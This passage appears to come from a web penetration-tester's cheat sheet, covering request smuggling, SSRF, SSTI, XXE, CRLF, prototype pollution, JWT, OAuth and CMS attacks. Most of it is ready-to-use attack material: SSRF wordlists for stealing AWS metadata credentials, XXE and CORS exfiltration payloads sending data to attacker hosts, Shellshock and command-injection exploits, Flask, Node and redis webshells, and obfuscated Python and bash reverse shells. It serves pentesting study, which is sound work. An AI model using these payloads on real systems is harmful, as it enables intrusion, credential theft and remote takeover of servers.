  2. Back-End use and process Content-Length header of 3 bytes, and the remainder starting with ATTACK are not processed and the backend server will handle it on the next request.

TE.TE - Transfer-Encoding X Transfer-Encoding

The frontend and backend support Transfer-Encoding, but it is possible to induce a non-processing on one of the servers through the obfuscating of the header. e.g.

Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding:[tab]chunked
Transfer-Encoding: x
[space]Transfer-Encoding: chunked
Transfer-Encoding[space]: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked

Tool

python3 smuggler.py -u <URL>

https://github.com/defparam/smuggler

-> Study
https://portswigger.net/web-security/request-smuggling

Open Redirect

Use of "@", to redirect to an address after the "@"

site.com@evil.com

Parameter Pollution

?url=website_whitelist.com&url=site.com

Open Redirect to XSS

e.g.

javascript:alert(1)
";alert(0);//

Nuclei Template

https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/vulnerabilities/generic/open-redirect.yaml

Server-Side Template Injection (SSTI)

Identify

-> Jinja2 or Twig

{{3*3}}

-> Smarty or Mako

{3*3}

-> ERB(Ruby)

<%= 7*7 %>

-> FreeMarker

#{3*3}

-> Other

${3*3}
${{3*3}}
3*3

Java Expression Language

{{T(java.lang.Runtime).getRuntime().exec('id')}}
''.class.forName('java.lang.Runtime').getRuntime().exec('id')

FreeMarker

-> Remote Code Execution

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

Python - Secret Key

{{settings.SECRET_KEY}}

Doc for SSTI

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Server-Side Request Forgery (SSRF)

Bypass in Filters

-> Host obfuscation (hex, octa, integer)
e.g.

http://0177.0.0.1  
http://0x7F.0.0.1 
http://2130706433

-> Rare address
e.g.

http://0/  
http://127.1
http://127.1.1  
http://127.127.127.127  
http://127.2.2.2  
http://127.2.0.2

-> URL encoding
e.g.
http://%31%32%37%2e%30%2e%30%2e%31

-> Enclosed alphanumerics

http://⑯⑨。②⑤④。⑯⑨。②⑤④
http://①②⑦。①

-> Bash variables
e.g.
http://evil.$site.com

-> Bypass of whitelist
e.g.
http://site.com@127.0.0.1

-> Domain redirection
e.g.
http://localtest.me

-> Using [::]
e.g.
http://[::]

Wordlist for localhost bypass

0o177.0.0.1
%30%6f%31%37%37%2e%30%2e%30%2e%31
http://%30%6f%31%37%37%2e%30%2e%30%2e%31
http://①②⑦。①
①②⑦。①
%60%61%66%02%60
%68%74%74%70%3a%2f%2f%60%61%66%02%60
http://0o177.0.0.1
q177.0.0.1
%71%31%37%37%2e%30%2e%30%2e%31
http://%71%31%37%37%2e%30%2e%30%2e%31
http://q177.0.0.1
o177.0.0.1
%6f%31%37%37%2e%30%2e%30%2e%31
http://%6f%31%37%37%2e%30%2e%30%2e%31
http://o177.0.0.1
0177.0.0.1
%30%31%37%37%2e%30%2e%30%2e%31
http://%30%31%37%37%2e%30%2e%30%2e%31
http://0177.0.0.1
2130706433
%32%31%33%30%37%30%36%34%33%33
http://%32%31%33%30%37%30%36%34%33%33
http://2130706433
127.0.0.0
%31%32%37%2e%30%2e%30%2e%30
http://%31%32%37%2e%30%2e%30%2e%30
http://127.0.0.0
127.0.1.3
%31%32%37%2e%30%2e%31%2e%33
http://%31%32%37%2e%30%2e%31%2e%33
http://127.0.1.3
127.127.127.127
%31%32%37%2e%31%32%37%2e%31%32%37%2e%31%32%37
http://%31%32%37%2e%31%32%37%2e%31%32%37%2e%31%32%37
http://127.127.127.127
[::]
http://[::]
0
%30
http://%30
http://0
127.1
%31%32%37%2e%31
http://%31%32%37%2e%31
%31%32%37%2e%30%2e%31
http://127.1
127.0.1
%31%32%37%2e%30%2e%31
http://%31%32%37%2e%30%2e%31
http://127.0.1
127.1.1.1
%31%32%37%2e%31%2e%31%2e%31
http://%31%32%37%2e%31%2e%31%2e%31
http://127.1.1.1
0x7f000001
%30%78%37%66%30%30%30%30%30%31
http://%30%78%37%66%30%30%30%30%30%31
http://0x7f000001
017700000001
%30%31%37%37%30%30%30%30%30%30%30%31
http://%30%31%37%37%30%30%30%30%30%30%30%31
http://017700000001
0177.00.00.01
%30%31%37%37%2e%30%30%2e%30%30%2e%30%31
http://%30%31%37%37%2e%30%30%2e%30%30%2e%30%31
http://0177.00.00.01
127.0.0.1.nip.io
%31%32%37%2e%30%2e%30%2e%31%2e%6e%69%70%2e%69%6f
http://%31%32%37%2e%30%2e%30%2e%31%2e%6e%69%70%2e%69%6f
http://127.0.0.1.nip.io
localtest.me
http://%6c%6f%63%61%6c%74%65%73%74%2e%6d%65
%6c%6f%63%61%6c%74%65%73%74%2e%6d%65
http://localtest.me
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/ssrf_local_bypass.txt

SSRF for metadata theft from AWS

-> target

http://169.254.169.254/latest/meta-data/iam/security-credentials/<iam-role>
http://169.254.169.254/latest/api/token 

-> Export credentials

export AWS_ACCESS_KEY_ID=<access_key_id>   
export AWS_SECRET_ACCESS_KEY=<secret_access_key>  
export AWS_SESSION_TOKEN=<session_token>  

-> Test obtaining the configured identity information

aws sts get-caller-identity

-> Performing enumeration and exploration in the cloud environment

In construction

Wordlist ssrf_meta_bypass

169.254.169.254.nip.io
http://169.254.169.254.nip.io
%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34%2e%6e%69%70%2e%69%6f
http://%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34%2e%6e%69%70%2e%69%6f
169.254.169.254
http://169.254.169.254
%68%74%74%70%3a%2f%2f%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34
http://%68%74%74%70%3a%2f%2f%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34
0251.0376.0251.0376	
http://0251.0376.0251.0376
%30%32%35%31%2e%30%33%37%36%2e%30%32%35%31%2e%30%33%37%36
http://%30%32%35%31%2e%30%33%37%36%2e%30%32%35%31%2e%30%33%37%36
0xA9FEA9FE
http://0xA9FEA9FE
%30%78%41%39%46%45%41%39%46%45
http://%30%78%41%39%46%45%41%39%46%45
2852039166
http://2852039166
%32%38%35%32%30%33%39%31%36%36
http://%32%38%35%32%30%33%39%31%36%36
⑯⑨。②⑤④。⑯⑨。②⑤④
http://⑯⑨。②⑤④。⑯⑨。②⑤④
%6f%68%02%61%64%63%02%6f%68%61%61%64%63%2f
http://%6f%68%02%61%64%63%02%6f%68%61%61%64%63%2f

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/ssrf_meta_bypass.txt

SSRF - Protocol Smuggling

-> HTTP-Based(Elastic, CouchDB, Mongodb, docker),etc.
-> Text-Based(ftp(21), smtp(587), zabbix(10051), mysql(3306), redis(6379), memcached(11211), etc.

-> gopher
gopher://127.0.0.1:port/_

Scripts

-> edit memcached.py

stats items  
stats cachedump <slab class> <number of items to dump>  
get <item>

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/ssrf_protocol_smuggling/memcached.py

-> zabbix.py
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/ssrf_protocol_smuggling/zabbix.py

Tool's

-> Gopherus
https://github.com/tarunkant/Gopherus

Docs for SSRF

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

Null Origin Exploitation

-> Identify - Response

HTTP/1.1 200 OK  
...  
Access-Control-Allow-Origin: null  
Access-Control-Allow-Credentials: true

Common

-> nullorigin.html

<html><head>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (xhr.readyState == XMLHttpRequest.DONE) {
	var r = xhr.responseText;
	alert(r)
	}
}
xhr.open('GET', 'http://site.com/admin.php', true);
xhr.withCredentials = true;
xhr.send(null);
</script>
</head></html>

Null Origin Exploitation Exfiltrate via url per server

-> nullorigin2.html

<html><head>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (xhr.readyState == XMLHttpRequest.DONE) {
 		var r = xhr.responseText;
		var d = r.split('>')[1].split('<')[0]
		function exfil() {
			document.write('<img src="http://your-ip:your-port/log.php?data=' + d + '"/>');
	}
	exfil();
	}
}
xhr.open('GET', 'http://site.com/admin.php', true);
xhr.withCredentials = true;
xhr.send(null);
</script>
</head></html>

Null Origin Exploitation Exfiltrate via url per server + base64

-> nulloriginb64.html

<iframe src="data:text/html;base64,<YOUR_BASE64_HERE>"></iframe>
</head></html>

CRLF Injection (CRLFI)

Carriage Return (\r), Line Feed (\n)
e.g.
-> Redirect via GET

/%0d%0aLocation:attacker

-> XSS via GET

/%0d%0a%0d%0a<svg onload="alert(1)">

XSS-Protection Bypass via CRLF

/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E

CSP Bypass via CRLF

%0d%0aX-Content-Security-Policy: allow *%0d%0a%0d%0a
%0d%0aX-Content-Security-Policy: allow *

Tools

crlfuzz -u "http://example.com"

https://github.com/dwisiswant0/crlfuzz

Template - Nuclei

https://raw.githubusercontent.com/pikpikcu/nuclei-templates/master/vulnerabilities/crlf-injection.yaml

XML External Entity (XXE)

Methods

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">

XXE - Blind Out-Of-Band

Exfiltrate data exfiltrating data via dtd

-> Part 1 (Main Request)

<!DOCTYPE r[
<!ELEMENT r ANY>
<!ENTITY % ult SYSTEM "http://ip/evil.dtd">
%ult;
%int;
]>
<r>&exfil;</r>

-> Part 2 (evil.dtd)

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">  
<!ENTITY % int "<!ENTITY exfil SYSTEM 'http://ip/?leak=%file;'>">  

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/xxe/evil.dtd

Retrieve data via error messages with dtd file

-> Part 1 (Request Principal)

<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://ip/error.dtd"> 
%xxe;
%payload;
%remote;
]>

-> Part 2 (error.dtd)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % payload "<!ENTITY &#37; remote SYSTEM 'file:///idonotexist/%file;'>">
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/xxe/error.dtd  

XInclude to retrieve files with dtd file

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

Image file upload

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/xxe/evil.svg

XSLT Server Side Injection

Identify

-> Transformation Service
-> XSLT engine

Exploit

-> ok.xsl

<!--
- Simple test to call php function
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
xmlns:php="http://php.net/xsl"
version="1.0">
<!-- We add the PHP's xmlns -->
 <xsl:template match="/">
 <html>
 <!-- We use the php suffix to call the function ucwords() -->
 <xsl:value-of select="php:function('system','uname -a')" />
 <!-- Output: 'Php Can Now Be Used In Xsl' -->
 </html>
 </xsl:template>
</xsl:stylesheet>

Prototype Pollution

Client Side

https://github.com/BlackFan/client-side-prototype-pollution

Server Side

-> exec.exec in req body with lodash - application/json

"__proto__":{
  "shell":"sleep 5"
}

https://nodejs.org/api/child_process.html#child_processexeccommand-options-callback

-> exec.fork in req body with lodash - application/json

  "__proto__":{
    "execPath":"/bin/bash",
    "execArgv":[
    "-c",
    "sleep 5"  
    ]
  }

https://nodejs.org/api/process.html

Remote Code Execution (RCE)

-> Special Characters

& command
&& command
; command
command %0A command
| command
|| command
`command`
$(command)

-> Out Of Band - OOB Exploitation

curl http://$(whoami).site.com/
curl http://`whoami`.site.com/
nslookup `whoami`.attacker-server.com &
curl http://192.168.0.20/$(whoami)

-> Check if the commands are executed by PowerShell or CMD.

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell 

RCE - Exfiltrating via DNS

curl http://$(whoami).site.com/
curl http://`whoami`.site.com/

Shellshock

-> Detection

nikto -h <IP> -C all

-> Exploit

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'whoami'" <IP>
curl -A "() { :; };echo ;/bin/bash -c 'hostname'"  <IP>
curl -A "() { :; }; /usr/bin/nslookup $(whoami).site.com" <IP>

Wordlists

https://github.com/payloadbox/command-injection-payload-list

API Exploitation

-> API Security Guide
https://github.com/0xCGonzalo/Golden-Guide-for-Pentesting/tree/master/API%20Security

-> API Security Checklist
https://github.com/shieldfy/API-Security-Checklist

-> API Security Tips
https://github.com/inonshk/31-days-of-API-Security-Tips

-> MindAPI
https://dsopas.github.io/MindAPI/play/

-> Simple website to guess API Key
https://api-guesser.netlify.app/

-> HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting

-> Fuzzing
https://github.com/assetnote/kiterunner

Rest API/JSON

The standard documentation is the WADL file:
e.g.
https://site.com/api/v1/wadl/
or
representation engines
-> swagger-ui
https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/#newsletter

SOAP/XML

The documentation uses WSDL formate and is save in ?wsdl:
e.g.
https://api.example.com/api/?wsdl
https://site.com/ok.asmx?wsdl

-> API testing tool
https://www.soapui.org/downloads/soapui

Graphql

-> Introspection
https://ivangoncharov.github.io/graphql-voyager/

-> No-Introspection - Clairvoyance allows us to get GraphQL API schema when introspection is disabled
https://github.com/nikitastupin/clairvoyance

-> graphw00f - GraphQL Server Fingerprinting

python3 main.py -f -t https://demo.hypergraphql.org:8484/graphql

https://github.com/dolevf/graphw00f

-> GraphQL Security - Quickly assess the security of your GraphQL apps
https://graphql.security/

JWT Attacks

-> Structure with jwt.io - decoder
https://jwt.io/

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 (Header)
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ (Payload)
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c (Signature)

JWT None Attack

  1. Change signature algorithm in the header to none
    eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
  2. Forge the payload content
  3. Leave the Signature part of the JWT empty and put a period in the token
    or
    -> jwt_tool
jwt_tool <jwt> -X a 

JWT Decoder

-> jwt_tool

jwt_tool <JWT>

-> jwt-decoder.py

python3 jwt-decoder.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"

https://github.com/mazen160/jwt-pwn

JWT Cracking - Brute-Force

-> crunch + jwt_tool

crunch 5 5 -o wl.txt
jwt_tool <jwt> -C -d wl.txt

-> go-jwt-cracker

./go-jwt-cracker -wordlist /pentest/wordlist.txt -token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"

https://github.com/mazen160/jwt-pwn

-> Hashcat

hashcat -a 0 -m 16500 jwt.txt wordlist.txt
hashcat jwt.txt -m 16500 -a 3 -w 2 ?d?d?d?d

-> John

john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

Docs

https://rodolfomarianocy.medium.com/jwt-token-entenda-do-ponto-de-vista-defensivo-e-ofensivo-1aad6406de53

Attacking OAuth

Workflow OAuth Authorization Code Grant Type

1-

GET /authorization?client_id=<client_id>&redirect_uri=https://site.com/callback&response_type=code&scope=openid%20profile%20email HTTP/1.1  
Host: site.com

2-

GET /callback?code=<code> HTTP/1.1
Host: site.com

Vulnerability Forced OAuth profile linking

-> CSRF

<html>
	<body>
      		<form action="http://site.com/callback?code=<code>" method="GET">
		</form> 
	</body>
	<script>
		document.forms[0].submit();
	</script>
</html>

Vulnerability Code Stealing

-> Open Redirect (redirect_uri)

https://site.com/authorization?client_id=%3Cclient_id%3E&redirect_uri=http://attacker.com/callback&response_type=code&scope=openid%20profile%20email

3-

POST /token HTTP/1.1
Host: oauth.server.com

client_id=<client_id>&client_secret=<client_secret>&redirect_uri=https://site.com/callback&grant_type=authorization_code&code=<code>

Vulnerability Brute-Force the Client Secret

POST /token 
Host: site.com
Content-Type: application/x-www-form-urlencoded  

client_id=<client_id>&client_secret=<BRUTE_FORCE>&redirect_uri=http%3A%2F%2Fip%2Fcallback&grant_type=authorization_code&code=<code>

4-

{
    "access_token": "<access_token>",
    "token_type": "Bearer",
    "expires_in": 3600,
    "scope": "openid profile"
}

5-

GET /userinfo HTTP/1.1  
Host: oauth.server.com  
Authorization: Bearer <token>

6-

{
    "username":"user",
    "email":"user@ok.com"
}

Padding Oracle Attack

e.g.
-> rememberMe: (Cookie)
-> Exploiting

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" > payload.class

https://github.com/frohoff/ysoserial

python shiro_exp.py site.com/home.jsp cookie payload.class

https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py

Race Condition

-> Burp Suite - race condition test using Send group in parallel
https://portswigger.net/burp/documentation/desktop/tools/repeater/send-group

-> Burp Suite - Extensions -> Turbo Intruder-> Send to Turbo Intruder -> select examples/race-single-packer-attack.py
https://portswigger.net/web-security/race-conditions

Content Management System (CMS)

Wordpress

-> wpscan enumeration

wpscan --url http://site.com/wordpress --api-token <your_token> --enumerate u,vp --plugins-detection aggressive
wpscan --url http://site.com/wordpress --api-token <your_token> --enumerate u,ap

-> wpscan brute force

wpscan --url http://site.com/ --passwords wordlist.txt

https://wpscan.com/wordpress-security-scanner

Joomla

-> juumla

python main.py -u <target>

https://github.com/oppsec/juumla

Drupal

-> droopescan

droopescan scan drupal -u <target> -t 32

https://github.com/SamJoan/droopescan

-> Reverse Shell
https://www.hackingarticles.in/drupal-reverseshell/

Magento

https://github.com/steverobbins/magescan

Third-party Software: ITSM, ITSO, ITBM

Jira

-> Check privileges in:

/rest/api/2/mypermissions
/rest/api/3/mypermissions

-> jira-scan

jira-scan -u https://site.com/

https://github.com/bcoles/jira_scan

-> Jiraffe

jiraffe -t https://site.com

https://github.com/0x48piraj/Jiraffe

SalesForce

-> sret

python3 main.py <URL>

https://github.com/reconstation/sret

SAP - ERP

Tools

https://github.com/chipik/SAP_RECON

Wordlists

https://raw.githubusercontent.com/emadshanab/SAP-wordlist/main/SAP-wordlist.txt

Others

https://github.com/shipcod3/mySapAdventures

ServiceNow

-> Brute-Force in KB00

https://company.service-now.com/kb_view_customer.do?sysparm_article=KB00xxxxx

https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56

Sharepoint

https://github.com/H0j3n/EzpzSharepoint

Some payloads for webshells and revshells

Webshell Infecting views.py - Python (Flask)

import os
from flask import Flask,request,os

app = Flask(__name__)
   
@app.route('/okay')
def cmd():
    return os.system(request.args.get('c'))

if __name__ == "__main__":
	app.run()

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/views.py

Webshell infecting views.js -> nodejs

const express = require('express')
const app = express();

app.listen(3000, () => 
	console.log('...')
);
function Exec(command){ 
	const { execSync } = require("child_process");
	const stdout = execSync(command);
	return "Result: "+stdout
}
app.get('/okay/:command', (req, res) => 
res.send(Exec(req.params.command))
);

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/views.js

Webshell via redis

redis-cli -h ip  
config set dir /var/www/html  
config set dbfilename ok.php  
set test "<?php system($_GET['okay'); ?>"  
save

Reverse Shell Obfuscator

e.g.
python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type hex

py$()thon -$()c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0xC0A80014",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type octa

py$()thon -$()c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0300.0250.0000.0024",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type long

py$()thon -$()c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3232235540",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type urle

py%24%28%29thon%20%24%28%29c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.0.20%22%2C443%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22sh%22%29%27

python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type b64

cHkkKCl0aG9uIC0kKCljICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4wLjIwIiw0NDMpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw==

python hackshell.py --payload bash --lhost 192.168.0.20 --lport 443 --type jlre

bash -c {echo,YmEkKClzaCAtJCgpaSAnL2Rldi90Y3AvMTkyLjE2OC4wLjIwLzQ0MyAwPiYxJw==}|{base64,-d}|{bash,-i}

https://github.com/rodolfomarianocy/hackshell

-> Other Tricks - Bypass

"__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('id')";

Recon (+)

Recon in ASN

-> asnpepper

python asnpepper.py -o <org> -O output.txt

-> masscan

masscan -iL cidrs.txt -oG output.txt — rate 10000 -p 80, 443, 8080

or

python asnpepper.py -o <org> --test-port 80,443 --threads 2000

https://bgp.he.net/
https://github.com/rodolfomarianocy/asnpepper
https://github.com/robertdavidgraham/masscan

One Line Commands

-> Parameters Discovery

python paramspider.py -d stripe.com | uro | httpx -fc 404 -silent | anew spider_parameters.txt && echo stripe.com | gau | gf xss | uro |  httpx -fc 404 -silent | anew gau_parameters.txt

Steps - Web Recon

1 - Subdomain Discovery

1.1 -> sublist3r+sort|uniq+httpx+anew

subslit3r -d site.com | sort | uniq | httpx -silent | anew subdomains.txt

1.2 -> subfinder+sort|uniq+httpx+anew

subfinder -d site.com  | sort | uniq | httpx -silent | anew subdomains.txt

1.3 -> crt+jq+grep+httpx+anew

curl "https://crt.sh/?q=$1&output=json" | jq -r '.[].name_value' | grep -v "*" | httpx -silent | anew subdomains.txt

2 - Parameter Discovery

2.1 -> gau+gf+uro+httpx+anew

cat subdomains.txt | gau | gf xss | uro | httpx -silent | anew parameters.txt

2.2 -> paramspider + uro + httpx

cat subdomains.txt | xargs -n 1 python paramspider.py -d | httpx -silent | gf xss | uro | anew parameters.txt

3 - JS files

3.1 -> gau+grep+httpx

cat subdomains.txt | grep "\.js" | httpx -fc 404 -silent -o js_files.txt

or

cat subdomains.txt | gau | subjs

4 - Discover endpoints and their parameters in JS files

python linkfinder.py -i https://example.com/1.js -o results.html

-> Used Tools
https://github.com/projectdiscovery/subfinder
https://github.com/aboul3la/Sublist3r
https://github.com/devanshbatham/ParamSpider
https://github.com/s0md3v/uro
https://github.com/projectdiscovery/httpx
https://github.com/tomnomnom/gf
https://github.com/1ndianl33t/Gf-Patterns
https://github.com/stedolan/jq
https://github.com/lc/subjs
https://github.com/GerbenJavado/LinkFinder

Other Tools

-> Project Discovery (Subdomain Discovery)
https://chaos.projectdiscovery.io/#/
-> aquatone (Tool for visual inspection of websites)
https://github.com/michenriksen/aquatone

Fuzzing (+)

Fuzzing Subdomain - DNS

ffuf -u "https://FUZZ.site.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Fuzzing Subdomain - VHOST

ffuf  -u "https://site.com" -H 'Host: FUZZ.site.com' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs xxx

Fuzzing File Extension

ffuf -u "https://site.com/indexFUZZ" -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -fs xxx

Fuzzing Parameter GET

ffuf -u "https://site.com/index.php?FUZZ=ok" -w wordlist.txt -fs xxx

Fuzzing Parameter POST

ffuf -u "https://site.com/index.php" -X POST -d 'FUZZ=ok' -H 'Content-Type: application/x-www-form-urlencoded' -w wordlist.txt -fs xxx

Certifications (+)

elearn Web Application Penetration Tester eXtreme - eWPTX

Apresentation def con Caxias do Sul - DCG5554
https://www.youtube.com/watch?v=2-im6aL6PkI 1 2 3 4 5 6 7 8 9 10 11 12 13

References:
https://elearnsecurity.com/product/ewptxv2-certification/
https://ine.com/learning/courses/web-application-penetration-testing-e-xtreme
https://rodolfomarianocy.medium.com/overview-ewptx-5a9d78414c7a
https://crowsec.com.br/
https://portswigger.net/web-security/all-labs

Other tools and things

Search across a half million git repos

https://grep.app

The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis.

https://gchq.github.io/CyberChef/

List of file signatures

https://en.wikipedia.org/wiki/List_of_file_signatures

Regex

https://regex101.com/

Encode for SQL Injection in Json

https://dencode.com/string/unicode-escape

Wildcard DNS

https://nip.io/

Explain Shell

https://explainshell.com/

CeWL - Custom Word List generator

https://github.com/digininja/CeWL

Webhook online

https://webhook.site/#!/b3d5ed21-b58d-4a77-b19d-b7cdc2eeadc0

builtwith - Find out what websites are Built with

https://builtwith.com/

Reverse Shell

https://www.revshells.com/

Api Security

https://platform.42crunch.com/

Source Code Search Engine

https://publicwww.com/